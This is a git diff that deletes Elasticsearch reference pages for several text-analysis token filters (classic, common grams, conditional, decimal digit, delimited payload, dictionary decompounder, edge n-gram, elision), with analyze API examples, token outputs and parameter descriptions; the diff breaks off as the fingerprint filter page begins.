b/docs/reference/analysis/tokenfilters/classic-tokenfilter.asciidoc deleted file mode 100644 index 8bab797a750..00000000000 --- a/docs/reference/analysis/tokenfilters/classic-tokenfilter.asciidoc +++ /dev/null @@ -1,147 +0,0 @@ -[[analysis-classic-tokenfilter]] -=== Classic token filter -++++ -Classic -++++ - -Performs optional post-processing of terms generated by the -<>. - -This filter removes the english possessive (`'s`) from the end of words and -removes dots from acronyms. It uses Lucene's -{lucene-analysis-docs}/standard/ClassicFilter.html[ClassicFilter]. - -[[analysis-classic-tokenfilter-analyze-ex]] -==== Example - -The following <> request demonstrates how the -classic token filter works. - -[source,console] --------------------------------------------------- -GET /_analyze -{ - "tokenizer" : "classic", - "filter" : ["classic"], - "text" : "The 2 Q.U.I.C.K. Brown-Foxes jumped over the lazy dog's bone." -} --------------------------------------------------- - -The filter produces the following tokens: - -[source,text] --------------------------------------------------- -[ The, 2, QUICK, Brown, Foxes, jumped, over, the, lazy, dog, bone ] --------------------------------------------------- - -///////////////////// -[source,console-result] --------------------------------------------------- -{ - "tokens" : [ - { - "token" : "The", - "start_offset" : 0, - "end_offset" : 3, - "type" : "", - "position" : 0 - }, - { - "token" : "2", - "start_offset" : 4, - "end_offset" : 5, - "type" : "", - "position" : 1 - }, - { - "token" : "QUICK", - "start_offset" : 6, - "end_offset" : 16, - "type" : "", - "position" : 2 - }, - { - "token" : "Brown", - "start_offset" : 17, - "end_offset" : 22, - "type" : "", - "position" : 3 - }, - { - "token" : "Foxes", - "start_offset" : 23, - "end_offset" : 28, - "type" : "", - "position" : 4 - }, - { - "token" : "jumped", - "start_offset" : 29, - "end_offset" : 35, - "type" : "", - "position" : 5 - }, - { - "token" : "over", - "start_offset" : 36, - "end_offset" : 40, - "type" : "", - "position" : 6 - }, - { - "token" : "the", - "start_offset" : 41, - "end_offset" : 44, - "type" : "", - "position" : 7 - }, - { - "token" : "lazy", - "start_offset" : 45, - "end_offset" : 49, - "type" : "", - "position" : 8 - }, - { - "token" : "dog", - "start_offset" : 50, - "end_offset" : 55, - "type" : "", - "position" : 9 - }, - { - "token" : "bone", - "start_offset" : 56, - "end_offset" : 60, - "type" : "", - "position" : 10 - } - ] -} --------------------------------------------------- -///////////////////// - -[[analysis-classic-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the -classic token filter to configure a new -<>. - -[source,console] --------------------------------------------------- -PUT /classic_example -{ - "settings": { - "analysis": { - "analyzer": { - "classic_analyzer": { - "tokenizer": "classic", - "filter": [ "classic" ] - } - } - } - } -} --------------------------------------------------- - diff --git a/docs/reference/analysis/tokenfilters/common-grams-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/common-grams-tokenfilter.asciidoc deleted file mode 100644 index 4913df9290c..00000000000 --- a/docs/reference/analysis/tokenfilters/common-grams-tokenfilter.asciidoc +++ /dev/null @@ -1,228 +0,0 @@ -[[analysis-common-grams-tokenfilter]] -=== Common grams token filter -++++ -Common grams -++++ - -Generates {wikipedia}/Bigram[bigrams] for a specified set of -common words. - -For example, you can specify `is` and `the` as common words. This filter then -converts the tokens `[the, quick, fox, is, brown]` to `[the, the_quick, quick, -fox, fox_is, is, is_brown, brown]`. - -You can use the `common_grams` filter in place of the -<> when you don't want to -completely ignore common words. - -This filter uses Lucene's -{lucene-analysis-docs}/commongrams/CommonGramsFilter.html[CommonGramsFilter]. - -[[analysis-common-grams-analyze-ex]] -==== Example - -The following <> request creates bigrams for `is` -and `the`: - -[source,console] --------------------------------------------------- -GET /_analyze -{ - "tokenizer" : "whitespace", - "filter" : [ - { - "type": "common_grams", - "common_words": ["is", "the"] - } - ], - "text" : "the quick fox is brown" -} --------------------------------------------------- - -The filter produces the following tokens: - -[source,text] --------------------------------------------------- -[ the, the_quick, quick, fox, fox_is, is, is_brown, brown ] --------------------------------------------------- - -///////////////////// -[source,console-result] --------------------------------------------------- -{ - "tokens" : [ - { - "token" : "the", - "start_offset" : 0, - "end_offset" : 3, - "type" : "word", - "position" : 0 - }, - { - "token" : "the_quick", - "start_offset" : 0, - "end_offset" : 9, - "type" : "gram", - "position" : 0, - "positionLength" : 2 - }, - { - "token" : "quick", - "start_offset" : 4, - "end_offset" : 9, - "type" : "word", - "position" : 1 - }, - { - "token" : "fox", - "start_offset" : 10, - "end_offset" : 13, - "type" : "word", - "position" : 2 - }, - { - "token" : "fox_is", - "start_offset" : 10, - "end_offset" : 16, - "type" : "gram", - "position" : 2, - "positionLength" : 2 - }, - { - "token" : "is", - "start_offset" : 14, - "end_offset" : 16, - "type" : "word", - "position" : 3 - }, - { - "token" : "is_brown", - "start_offset" : 14, - "end_offset" : 22, - "type" : "gram", - "position" : 3, - "positionLength" : 2 - }, - { - "token" : "brown", - "start_offset" : 17, - "end_offset" : 22, - "type" : "word", - "position" : 4 - } - ] -} --------------------------------------------------- -///////////////////// - -[[analysis-common-grams-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the -`common_grams` filter to configure a new -<>: - -[source,console] --------------------------------------------------- -PUT /common_grams_example -{ - "settings": { - "analysis": { - "analyzer": { - "index_grams": { - "tokenizer": "whitespace", - "filter": [ "common_grams" ] - } - }, - "filter": { - "common_grams": { - "type": "common_grams", - "common_words": [ "a", "is", "the" ] - } - } - } - } -} --------------------------------------------------- - -[[analysis-common-grams-tokenfilter-configure-parms]] -==== Configurable parameters - -`common_words`:: -+ --- -(Required+++*+++, array of strings) -A list of tokens. The filter generates bigrams for these tokens. - -Either this or the `common_words_path` parameter is required. --- - -`common_words_path`:: -+ --- -(Required+++*+++, string) -Path to a file containing a list of tokens. The filter generates bigrams for -these tokens. - -This path must be absolute or relative to the `config` location. The file must -be UTF-8 encoded. Each token in the file must be separated by a line break. - -Either this or the `common_words` parameter is required. --- - -`ignore_case`:: -(Optional, Boolean) -If `true`, matches for common words matching are case-insensitive. -Defaults to `false`. - -`query_mode`:: -+ --- -(Optional, Boolean) -If `true`, the filter excludes the following tokens from the output: - -* Unigrams for common words -* Unigrams for terms followed by common words - -Defaults to `false`. We recommend enabling this parameter for -<>. - -For example, you can enable this parameter and specify `is` and `the` as -common words. This filter converts the tokens `[the, quick, fox, is, brown]` to -`[the_quick, quick, fox_is, is_brown,]`. --- - -[[analysis-common-grams-tokenfilter-customize]] -==== Customize - -To customize the `common_grams` filter, duplicate it to create the basis -for a new custom token filter. You can modify the filter using its configurable -parameters. - -For example, the following request creates a custom `common_grams` filter with -`ignore_case` and `query_mode` set to `true`: - -[source,console] --------------------------------------------------- -PUT /common_grams_example -{ - "settings": { - "analysis": { - "analyzer": { - "index_grams": { - "tokenizer": "whitespace", - "filter": [ "common_grams_query" ] - } - }, - "filter": { - "common_grams_query": { - "type": "common_grams", - "common_words": [ "a", "is", "the" ], - "ignore_case": true, - "query_mode": true - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/analysis/tokenfilters/condition-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/condition-tokenfilter.asciidoc deleted file mode 100644 index a33a41e85a8..00000000000 --- a/docs/reference/analysis/tokenfilters/condition-tokenfilter.asciidoc +++ /dev/null @@ -1,148 +0,0 @@ -[[analysis-condition-tokenfilter]] -=== Conditional token filter -++++ -Conditional -++++ - -Applies a set of token filters to tokens that match conditions in a provided -predicate script. - -This filter uses Lucene's -{lucene-analysis-docs}/miscellaneous/ConditionalTokenFilter.html[ConditionalTokenFilter]. - -[[analysis-condition-analyze-ex]] -==== Example - -The following <> request uses the `condition` -filter to match tokens with fewer than 5 characters in `THE QUICK BROWN FOX`. -It then applies the <> filter to -those matching tokens, converting them to lowercase. - -[source,console] --------------------------------------------------- -GET /_analyze -{ - "tokenizer": "standard", - "filter": [ - { - "type": "condition", - "filter": [ "lowercase" ], - "script": { - "source": "token.getTerm().length() < 5" - } - } - ], - "text": "THE QUICK BROWN FOX" -} --------------------------------------------------- - -The filter produces the following tokens: - -[source,text] --------------------------------------------------- -[ the, QUICK, BROWN, fox ] --------------------------------------------------- - -///////////////////// -[source,console-result] --------------------------------------------------- -{ - "tokens" : [ - { - "token" : "the", - "start_offset" : 0, - "end_offset" : 3, - "type" : "", - "position" : 0 - }, - { - "token" : "QUICK", - "start_offset" : 4, - "end_offset" : 9, - "type" : "", - "position" : 1 - }, - { - "token" : "BROWN", - "start_offset" : 10, - "end_offset" : 15, - "type" : "", - "position" : 2 - }, - { - "token" : "fox", - "start_offset" : 16, - "end_offset" : 19, - "type" : "", - "position" : 3 - } - ] -} --------------------------------------------------- -///////////////////// - -[[analysis-condition-tokenfilter-configure-parms]] -==== Configurable parameters - -`filter`:: -+ --- -(Required, array of token filters) -Array of token filters. If a token matches the predicate script in the `script` -parameter, these filters are applied to the token in the order provided. - -These filters can include custom token filters defined in the index mapping. --- - -`script`:: -+ --- -(Required, <>) -Predicate script used to apply token filters. If a token -matches this script, the filters in the `filter` parameter are applied to the -token. - -For valid parameters, see <<_script_parameters>>. Only inline scripts are -supported. Painless scripts are executed in the -{painless}/painless-analysis-predicate-context.html[analysis predicate context] -and require a `token` property. --- - -[[analysis-condition-tokenfilter-customize]] -==== Customize and add to an analyzer - -To customize the `condition` filter, duplicate it to create the basis -for a new custom token filter. You can modify the filter using its configurable -parameters. - -For example, the following <> request -uses a custom `condition` filter to configure a new -<>. The custom `condition` filter -matches the first token in a stream. It then reverses that matching token using -the <> filter. - -[source,console] --------------------------------------------------- -PUT /palindrome_list -{ - "settings": { - "analysis": { - "analyzer": { - "whitespace_reverse_first_token": { - "tokenizer": "whitespace", - "filter": [ "reverse_first_token" ] - } - }, - "filter": { - "reverse_first_token": { - "type": "condition", - "filter": [ "reverse" ], - "script": { - "source": "token.getPosition() === 0" - } - } - } - } - } -} --------------------------------------------------- \ No newline at end of file diff --git a/docs/reference/analysis/tokenfilters/decimal-digit-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/decimal-digit-tokenfilter.asciidoc deleted file mode 100644 index 6436bad8ac3..00000000000 --- a/docs/reference/analysis/tokenfilters/decimal-digit-tokenfilter.asciidoc +++ /dev/null @@ -1,89 +0,0 @@ -[[analysis-decimal-digit-tokenfilter]] -=== Decimal digit token filter -++++ -Decimal digit -++++ - -Converts all digits in the Unicode `Decimal_Number` General Category to `0-9`. -For example, the filter changes the Bengali numeral `৩` to `3`. - -This filter uses Lucene's -{lucene-analysis-docs}/core/DecimalDigitFilter.html[DecimalDigitFilter]. - -[[analysis-decimal-digit-tokenfilter-analyze-ex]] -==== Example - -The following <> request uses the `decimal_digit` -filter to convert Devanagari numerals to `0-9`: - -[source,console] --------------------------------------------------- -GET /_analyze -{ - "tokenizer" : "whitespace", - "filter" : ["decimal_digit"], - "text" : "१-one two-२ ३" -} --------------------------------------------------- - -The filter produces the following tokens: - -[source,text] --------------------------------------------------- -[ 1-one, two-2, 3] --------------------------------------------------- - -///////////////////// -[source,console-result] --------------------------------------------------- -{ - "tokens" : [ - { - "token" : "1-one", - "start_offset" : 0, - "end_offset" : 5, - "type" : "word", - "position" : 0 - }, - { - "token" : "two-2", - "start_offset" : 6, - "end_offset" : 11, - "type" : "word", - "position" : 1 - }, - { - "token" : "3", - "start_offset" : 12, - "end_offset" : 13, - "type" : "word", - "position" : 2 - } - ] -} --------------------------------------------------- -///////////////////// - -[[analysis-decimal-digit-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the -`decimal_digit` filter to configure a new -<>. - -[source,console] --------------------------------------------------- -PUT /decimal_digit_example -{ - "settings": { - "analysis": { - "analyzer": { - "whitespace_decimal_digit": { - "tokenizer": "whitespace", - "filter": [ "decimal_digit" ] - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/analysis/tokenfilters/delimited-payload-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/delimited-payload-tokenfilter.asciidoc deleted file mode 100644 index 0bcc1ca12c3..00000000000 --- a/docs/reference/analysis/tokenfilters/delimited-payload-tokenfilter.asciidoc +++ /dev/null @@ -1,324 +0,0 @@ -[[analysis-delimited-payload-tokenfilter]] -=== Delimited payload token filter -++++ -Delimited payload -++++ - -[WARNING] -==== -The older name `delimited_payload_filter` is deprecated and should not be used -with new indices. Use `delimited_payload` instead. -==== - -Separates a token stream into tokens and payloads based on a specified -delimiter. - -For example, you can use the `delimited_payload` filter with a `|` delimiter to -split `the|1 quick|2 fox|3` into the tokens `the`, `quick`, and `fox` -with respective payloads of `1`, `2`, and `3`. - -This filter uses Lucene's -{lucene-analysis-docs}/payloads/DelimitedPayloadTokenFilter.html[DelimitedPayloadTokenFilter]. - -[NOTE] -.Payloads -==== -A payload is user-defined binary data associated with a token position and -stored as base64-encoded bytes. - -{es} does not store token payloads by default. To store payloads, you must: - -* Set the <> mapping parameter to - `with_positions_payloads` or `with_positions_offsets_payloads` for any field - storing payloads. -* Use an index analyzer that includes the `delimited_payload` filter - -You can view stored payloads using the <>. -==== - -[[analysis-delimited-payload-tokenfilter-analyze-ex]] -==== Example - -The following <> request uses the -`delimited_payload` filter with the default `|` delimiter to split -`the|0 brown|10 fox|5 is|0 quick|10` into tokens and payloads. - -[source,console] --------------------------------------------------- -GET _analyze -{ - "tokenizer": "whitespace", - "filter": ["delimited_payload"], - "text": "the|0 brown|10 fox|5 is|0 quick|10" -} --------------------------------------------------- - -The filter produces the following tokens: - -[source,text] --------------------------------------------------- -[ the, brown, fox, is, quick ] --------------------------------------------------- - -Note that the analyze API does not return stored payloads. For an example that -includes returned payloads, see -<>. - -///////////////////// -[source,console-result] --------------------------------------------------- -{ - "tokens": [ - { - "token": "the", - "start_offset": 0, - "end_offset": 5, - "type": "word", - "position": 0 - }, - { - "token": "brown", - "start_offset": 6, - "end_offset": 14, - "type": "word", - "position": 1 - }, - { - "token": "fox", - "start_offset": 15, - "end_offset": 20, - "type": "word", - "position": 2 - }, - { - "token": "is", - "start_offset": 21, - "end_offset": 25, - "type": "word", - "position": 3 - }, - { - "token": "quick", - "start_offset": 26, - "end_offset": 34, - "type": "word", - "position": 4 - } - ] -} --------------------------------------------------- -///////////////////// - -[[analysis-delimited-payload-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the -`delimited-payload` filter to configure a new <>. - -[source,console] --------------------------------------------------- -PUT delimited_payload -{ - "settings": { - "analysis": { - "analyzer": { - "whitespace_delimited_payload": { - "tokenizer": "whitespace", - "filter": [ "delimited_payload" ] - } - } - } - } -} --------------------------------------------------- - -[[analysis-delimited-payload-tokenfilter-configure-parms]] -==== Configurable parameters - -`delimiter`:: -(Optional, string) -Character used to separate tokens from payloads. Defaults to `|`. - -`encoding`:: -+ --- -(Optional, string) -Data type for the stored payload. Valid values are: - -`float`::: -(Default) Float - -`identity`::: -Characters - -`int`::: -Integer --- - -[[analysis-delimited-payload-tokenfilter-customize]] -==== Customize and add to an analyzer - -To customize the `delimited_payload` filter, duplicate it to create the basis -for a new custom token filter. You can modify the filter using its configurable -parameters. - -For example, the following <> request -uses a custom `delimited_payload` filter to configure a new -<>. The custom `delimited_payload` -filter uses the `+` delimiter to separate tokens from payloads. Payloads are -encoded as integers. - -[source,console] --------------------------------------------------- -PUT delimited_payload_example -{ - "settings": { - "analysis": { - "analyzer": { - "whitespace_plus_delimited": { - "tokenizer": "whitespace", - "filter": [ "plus_delimited" ] - } - }, - "filter": { - "plus_delimited": { - "type": "delimited_payload", - "delimiter": "+", - "encoding": "int" - } - } - } - } -} --------------------------------------------------- - -[[analysis-delimited-payload-tokenfilter-return-stored-payloads]] -==== Return stored payloads - -Use the <> to create an index that: - -* Includes a field that stores term vectors with payloads. -* Uses a <> with the - `delimited_payload` filter. - -[source,console] --------------------------------------------------- -PUT text_payloads -{ - "mappings": { - "properties": { - "text": { - "type": "text", - "term_vector": "with_positions_payloads", - "analyzer": "payload_delimiter" - } - } - }, - "settings": { - "analysis": { - "analyzer": { - "payload_delimiter": { - "tokenizer": "whitespace", - "filter": [ "delimited_payload" ] - } - } - } - } -} --------------------------------------------------- - -Add a document containing payloads to the index. - -[source,console] --------------------------------------------------- -POST text_payloads/_doc/1 -{ - "text": "the|0 brown|3 fox|4 is|0 quick|10" -} --------------------------------------------------- -// TEST[continued] - -Use the <> to return the document's tokens -and base64-encoded payloads. - -[source,console] --------------------------------------------------- -GET text_payloads/_termvectors/1 -{ - "fields": [ "text" ], - "payloads": true -} --------------------------------------------------- -// TEST[continued] - -The API returns the following response: - -[source,console-result] --------------------------------------------------- -{ - "_index": "text_payloads", - "_type": "_doc", - "_id": "1", - "_version": 1, - "found": true, - "took": 8, - "term_vectors": { - "text": { - "field_statistics": { - "sum_doc_freq": 5, - "doc_count": 1, - "sum_ttf": 5 - }, - "terms": { - "brown": { - "term_freq": 1, - "tokens": [ - { - "position": 1, - "payload": "QEAAAA==" - } - ] - }, - "fox": { - "term_freq": 1, - "tokens": [ - { - "position": 2, - "payload": "QIAAAA==" - } - ] - }, - "is": { - "term_freq": 1, - "tokens": [ - { - "position": 3, - "payload": "AAAAAA==" - } - ] - }, - "quick": { - "term_freq": 1, - "tokens": [ - { - "position": 4, - "payload": "QSAAAA==" - } - ] - }, - "the": { - "term_freq": 1, - "tokens": [ - { - "position": 0, - "payload": "AAAAAA==" - } - ] - } - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 8/"took": "$body.took"/] diff --git a/docs/reference/analysis/tokenfilters/dictionary-decompounder-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/dictionary-decompounder-tokenfilter.asciidoc deleted file mode 100644 index 0e3c5804f26..00000000000 --- a/docs/reference/analysis/tokenfilters/dictionary-decompounder-tokenfilter.asciidoc +++ /dev/null @@ -1,173 +0,0 @@ -[[analysis-dict-decomp-tokenfilter]] -=== Dictionary decompounder token filter -++++ -Dictionary decompounder -++++ - -[NOTE] -==== -In most cases, we recommend using the faster -<> token filter -in place of this filter. However, you can use the -`dictionary_decompounder` filter to check the quality of a word list before -implementing it in the `hyphenation_decompounder` filter. -==== - -Uses a specified list of words and a brute force approach to find subwords in -compound words. If found, these subwords are included in the token output. - -This filter uses Lucene's -{lucene-analysis-docs}/compound/DictionaryCompoundWordTokenFilter.html[DictionaryCompoundWordTokenFilter], -which was built for Germanic languages. - -[[analysis-dict-decomp-tokenfilter-analyze-ex]] -==== Example - -The following <> request uses the -`dictionary_decompounder` filter to find subwords in `Donaudampfschiff`. The -filter then checks these subwords against the specified list of words: `Donau`, -`dampf`, `meer`, and `schiff`. - -[source,console] --------------------------------------------------- -GET _analyze -{ - "tokenizer": "standard", - "filter": [ - { - "type": "dictionary_decompounder", - "word_list": ["Donau", "dampf", "meer", "schiff"] - } - ], - "text": "Donaudampfschiff" -} --------------------------------------------------- - -The filter produces the following tokens: - -[source,text] --------------------------------------------------- -[ Donaudampfschiff, Donau, dampf, schiff ] --------------------------------------------------- - -///////////////////// -[source,console-result] --------------------------------------------------- -{ - "tokens" : [ - { - "token" : "Donaudampfschiff", - "start_offset" : 0, - "end_offset" : 16, - "type" : "", - "position" : 0 - }, - { - "token" : "Donau", - "start_offset" : 0, - "end_offset" : 16, - "type" : "", - "position" : 0 - }, - { - "token" : "dampf", - "start_offset" : 0, - "end_offset" : 16, - "type" : "", - "position" : 0 - }, - { - "token" : "schiff", - "start_offset" : 0, - "end_offset" : 16, - "type" : "", - "position" : 0 - } - ] -} --------------------------------------------------- -///////////////////// - -[[analysis-dict-decomp-tokenfilter-configure-parms]] -==== Configurable parameters - -`word_list`:: -+ --- -(Required+++*+++, array of strings) -A list of subwords to look for in the token stream. If found, the subword is -included in the token output. - -Either this parameter or `word_list_path` must be specified. --- - -`word_list_path`:: -+ --- -(Required+++*+++, string) -Path to a file that contains a list of subwords to find in the token stream. If -found, the subword is included in the token output. - -This path must be absolute or relative to the `config` location, and the file -must be UTF-8 encoded. Each token in the file must be separated by a line break. - -Either this parameter or `word_list` must be specified. --- - -`max_subword_size`:: -(Optional, integer) -Maximum subword character length. Longer subword tokens are excluded from the -output. Defaults to `15`. - -`min_subword_size`:: -(Optional, integer) -Minimum subword character length. Shorter subword tokens are excluded from the -output. Defaults to `2`. - -`min_word_size`:: -(Optional, integer) -Minimum word character length. Shorter word tokens are excluded from the -output. Defaults to `5`. - -`only_longest_match`:: -(Optional, Boolean) -If `true`, only include the longest matching subword. Defaults to `false`. - -[[analysis-dict-decomp-tokenfilter-customize]] -==== Customize and add to an analyzer - -To customize the `dictionary_decompounder` filter, duplicate it to create the -basis for a new custom token filter. You can modify the filter using its -configurable parameters. - -For example, the following <> request -uses a custom `dictionary_decompounder` filter to configure a new -<>. - -The custom `dictionary_decompounder` filter find subwords in the -`analysis/example_word_list.txt` file. Subwords longer than 22 characters are -excluded from the token output. - -[source,console] --------------------------------------------------- -PUT dictionary_decompound_example -{ - "settings": { - "analysis": { - "analyzer": { - "standard_dictionary_decompound": { - "tokenizer": "standard", - "filter": [ "22_char_dictionary_decompound" ] - } - }, - "filter": { - "22_char_dictionary_decompound": { - "type": "dictionary_decompounder", - "word_list_path": "analysis/example_word_list.txt", - "max_subword_size": 22 - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/analysis/tokenfilters/edgengram-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/edgengram-tokenfilter.asciidoc deleted file mode 100644 index a3c4fa36ce1..00000000000 --- a/docs/reference/analysis/tokenfilters/edgengram-tokenfilter.asciidoc +++ /dev/null @@ -1,248 +0,0 @@ -[[analysis-edgengram-tokenfilter]] -=== Edge n-gram token filter -++++ -Edge n-gram -++++ - -Forms an {wikipedia}/N-gram[n-gram] of a specified length from -the beginning of a token. - -For example, you can use the `edge_ngram` token filter to change `quick` to -`qu`. - -When not customized, the filter creates 1-character edge n-grams by default. - -This filter uses Lucene's -{lucene-analysis-docs}/ngram/EdgeNGramTokenFilter.html[EdgeNGramTokenFilter]. - -[NOTE] -==== -The `edge_ngram` filter is similar to the <>. However, the `edge_ngram` only outputs n-grams that start at the -beginning of a token. These edge n-grams are useful for -<> queries. -==== - -[[analysis-edgengram-tokenfilter-analyze-ex]] -==== Example - -The following <> request uses the `edge_ngram` -filter to convert `the quick brown fox jumps` to 1-character and 2-character -edge n-grams: - -[source,console] --------------------------------------------------- -GET _analyze -{ - "tokenizer": "standard", - "filter": [ - { "type": "edge_ngram", - "min_gram": 1, - "max_gram": 2 - } - ], - "text": "the quick brown fox jumps" -} --------------------------------------------------- - -The filter produces the following tokens: - -[source,text] --------------------------------------------------- -[ t, th, q, qu, b, br, f, fo, j, ju ] --------------------------------------------------- - -///////////////////// -[source,console-result] --------------------------------------------------- -{ - "tokens" : [ - { - "token" : "t", - "start_offset" : 0, - "end_offset" : 3, - "type" : "", - "position" : 0 - }, - { - "token" : "th", - "start_offset" : 0, - "end_offset" : 3, - "type" : "", - "position" : 0 - }, - { - "token" : "q", - "start_offset" : 4, - "end_offset" : 9, - "type" : "", - "position" : 1 - }, - { - "token" : "qu", - "start_offset" : 4, - "end_offset" : 9, - "type" : "", - "position" : 1 - }, - { - "token" : "b", - "start_offset" : 10, - "end_offset" : 15, - "type" : "", - "position" : 2 - }, - { - "token" : "br", - "start_offset" : 10, - "end_offset" : 15, - "type" : "", - "position" : 2 - }, - { - "token" : "f", - "start_offset" : 16, - "end_offset" : 19, - "type" : "", - "position" : 3 - }, - { - "token" : "fo", - "start_offset" : 16, - "end_offset" : 19, - "type" : "", - "position" : 3 - }, - { - "token" : "j", - "start_offset" : 20, - "end_offset" : 25, - "type" : "", - "position" : 4 - }, - { - "token" : "ju", - "start_offset" : 20, - "end_offset" : 25, - "type" : "", - "position" : 4 - } - ] -} --------------------------------------------------- -///////////////////// - -[[analysis-edgengram-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the -`edge_ngram` filter to configure a new -<>. - -[source,console] --------------------------------------------------- -PUT edge_ngram_example -{ - "settings": { - "analysis": { - "analyzer": { - "standard_edge_ngram": { - "tokenizer": "standard", - "filter": [ "edge_ngram" ] - } - } - } - } -} --------------------------------------------------- - -[[analysis-edgengram-tokenfilter-configure-parms]] -==== Configurable parameters - -`max_gram`:: -+ --- -(Optional, integer) -Maximum character length of a gram. For custom token filters, defaults to `2`. -For the built-in `edge_ngram` filter, defaults to `1`. - -See <>. --- - -`min_gram`:: -(Optional, integer) -Minimum character length of a gram. Defaults to `1`. - -`preserve_original`:: -(Optional, Boolean) -Emits original token when set to `true`. Defaults to `false`. - -`side`:: -+ --- -(Optional, string) -Deprecated. Indicates whether to truncate tokens from the `front` or `back`. -Defaults to `front`. - -Instead of using the `back` value, you can use the -<> token filter before and after the -`edge_ngram` filter to achieve the same results. --- - -[[analysis-edgengram-tokenfilter-customize]] -==== Customize - -To customize the `edge_ngram` filter, duplicate it to create the basis -for a new custom token filter. You can modify the filter using its configurable -parameters. - -For example, the following request creates a custom `edge_ngram` -filter that forms n-grams between 3-5 characters. - -[source,console] --------------------------------------------------- -PUT edge_ngram_custom_example -{ - "settings": { - "analysis": { - "analyzer": { - "default": { - "tokenizer": "whitespace", - "filter": [ "3_5_edgegrams" ] - } - }, - "filter": { - "3_5_edgegrams": { - "type": "edge_ngram", - "min_gram": 3, - "max_gram": 5 - } - } - } - } -} --------------------------------------------------- - -[[analysis-edgengram-tokenfilter-max-gram-limits]] -==== Limitations of the `max_gram` parameter - -The `edge_ngram` filter's `max_gram` value limits the character length of -tokens. When the `edge_ngram` filter is used with an index analyzer, this -means search terms longer than the `max_gram` length may not match any indexed -terms. - -For example, if the `max_gram` is `3`, searches for `apple` won't match the -indexed term `app`. - -To account for this, you can use the -<> filter with a search analyzer -to shorten search terms to the `max_gram` character length. However, this could -return irrelevant results. - -For example, if the `max_gram` is `3` and search terms are truncated to three -characters, the search term `apple` is shortened to `app`. This means searches -for `apple` return any indexed terms matching `app`, such as `apply`, `snapped`, -and `apple`. - -We recommend testing both approaches to see which best fits your -use case and desired search experience. diff --git a/docs/reference/analysis/tokenfilters/elision-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/elision-tokenfilter.asciidoc deleted file mode 100644 index 3d6d629886c..00000000000 --- a/docs/reference/analysis/tokenfilters/elision-tokenfilter.asciidoc +++ /dev/null @@ -1,186 +0,0 @@ -[[analysis-elision-tokenfilter]] -=== Elision token filter -++++ -Elision -++++ - -Removes specified {wikipedia}/Elision[elisions] from -the beginning of tokens. For example, you can use this filter to change -`l'avion` to `avion`. - -When not customized, the filter removes the following French elisions by default: - -`l'`, `m'`, `t'`, `qu'`, `n'`, `s'`, `j'`, `d'`, `c'`, `jusqu'`, `quoiqu'`, -`lorsqu'`, `puisqu'` - -Customized versions of this filter are included in several of {es}'s built-in -<>: - -* <> -* <> -* <> -* <> - -This filter uses Lucene's -{lucene-analysis-docs}/util/ElisionFilter.html[ElisionFilter]. - -[[analysis-elision-tokenfilter-analyze-ex]] -==== Example - -The following <> request uses the `elision` -filter to remove `j'` from `j’examine près du wharf`: - -[source,console] --------------------------------------------------- -GET _analyze -{ - "tokenizer" : "standard", - "filter" : ["elision"], - "text" : "j’examine près du wharf" -} --------------------------------------------------- - -The filter produces the following tokens: - -[source,text] --------------------------------------------------- -[ examine, près, du, wharf ] --------------------------------------------------- - -///////////////////// -[source,console-result] --------------------------------------------------- -{ - "tokens" : [ - { - "token" : "examine", - "start_offset" : 0, - "end_offset" : 9, - "type" : "", - "position" : 0 - }, - { - "token" : "près", - "start_offset" : 10, - "end_offset" : 14, - "type" : "", - "position" : 1 - }, - { - "token" : "du", - "start_offset" : 15, - "end_offset" : 17, - "type" : "", - "position" : 2 - }, - { - "token" : "wharf", - "start_offset" : 18, - "end_offset" : 23, - "type" : "", - "position" : 3 - } - ] -} --------------------------------------------------- -///////////////////// - -[[analysis-elision-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the -`elision` filter to configure a new -<>. - -[source,console] --------------------------------------------------- -PUT /elision_example -{ - "settings": { - "analysis": { - "analyzer": { - "whitespace_elision": { - "tokenizer": "whitespace", - "filter": [ "elision" ] - } - } - } - } -} --------------------------------------------------- - -[[analysis-elision-tokenfilter-configure-parms]] -==== Configurable parameters - -[[analysis-elision-tokenfilter-articles]] -`articles`:: -+ --- -(Required+++*+++, array of string) -List of elisions to remove. - -To be removed, the elision must be at the beginning of a token and be -immediately followed by an apostrophe. Both the elision and apostrophe are -removed. - -For custom `elision` filters, either this parameter or `articles_path` must be -specified. --- - -`articles_path`:: -+ --- -(Required+++*+++, string) -Path to a file that contains a list of elisions to remove. - -This path must be absolute or relative to the `config` location, and the file -must be UTF-8 encoded. Each elision in the file must be separated by a line -break. - -To be removed, the elision must be at the beginning of a token and be -immediately followed by an apostrophe. Both the elision and apostrophe are -removed. - -For custom `elision` filters, either this parameter or `articles` must be -specified. --- - -`articles_case`:: -(Optional, Boolean) -If `true`, the filter treats any provided elisions as case sensitive. -Defaults to `false`. - -[[analysis-elision-tokenfilter-customize]] -==== Customize - -To customize the `elision` filter, duplicate it to create the basis -for a new custom token filter. You can modify the filter using its configurable -parameters. - -For example, the following request creates a custom case-sensitive `elision` -filter that removes the `l'`, `m'`, `t'`, `qu'`, `n'`, `s'`, -and `j'` elisions: - -[source,console] --------------------------------------------------- -PUT /elision_case_sensitive_example -{ - "settings": { - "analysis": { - "analyzer": { - "default": { - "tokenizer": "whitespace", - "filter": [ "elision_case_sensitive" ] - } - }, - "filter": { - "elision_case_sensitive": { - "type": "elision", - "articles": [ "l", "m", "t", "qu", "n", "s", "j" ], - "articles_case": true - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/analysis/tokenfilters/fingerprint-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/fingerprint-tokenfilter.asciidoc deleted file mode 100644 index 78a96376351..00000000000 --- 